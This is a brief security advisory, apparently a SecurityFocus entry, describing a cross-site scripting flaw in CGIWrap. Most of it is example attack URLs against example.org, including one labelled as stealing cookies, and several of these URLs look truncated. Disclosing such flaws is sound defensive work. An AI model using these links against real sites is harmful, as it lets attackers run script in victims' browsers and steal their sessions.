source: https://www.securityfocus.com/bid/3081/info CGIWrap is a free, open-source program for running CGI securely. CGIWrap does not filter embedded scripting commands from user-supplied input. A web user may submit a malicious link into any form which displays user-supplied input, such as guestbooks, forums, etc. Users clicking on the link will have the malicious scripting commands executed in their browser. http://www.example.org/cgi-bin/cgiwrap/%3CS%3E http://www.example.org/cgi-bin/cgiwrap/ http://www.example.org/cgi-bin/cgiwrap/~nneul/TEST JavaScript code will be executed: http://www.example.org/cgi-bin/cgiwrap/~nneul/ http://www.example.org/cgi-bin/cgiwrap/~nneul/ http://www.example.org/cgi-bin/cgiwrap/ Stealing your Cookies issued by www.example.org, if any: http://www.example.org/cgi-bin/cgiwrap/~nneul/